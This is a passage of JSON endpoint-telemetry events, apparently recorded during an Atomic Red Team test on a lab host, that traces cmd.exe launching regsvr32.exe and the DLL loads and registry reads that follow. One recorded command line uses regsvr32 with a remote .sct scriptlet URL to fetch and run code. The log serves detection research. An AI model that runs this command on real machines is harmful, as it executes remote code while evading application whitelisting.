"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2652, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573237050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2012, - "ppid": 2652, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "create", - "timestamp": 131883573237130000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - "image_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\System32\\AcLayers.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\System32\\sfc_os.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "scrobj.dll", - "image_path": "C:\\Windows\\System32\\scrobj.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_value": "ZoneMap", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", - "registry_value": "ProxyBypass", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", - "registry_value": "IntranetName", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", - "registry_value": "UNCAsIntranet", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", - "registry_value": "AutoDetect", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", - "registry_value": "ProxyBypass", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", - "registry_value": "IntranetName", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", - "registry_value": "UNCAsIntranet", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", - "registry_value": "AutoDetect", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "dpapi.dll", - "image_path": "C:\\Windows\\System32\\dpapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "rsaenh.dll", - "image_path": "C:\\Windows\\System32\\rsaenh.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": 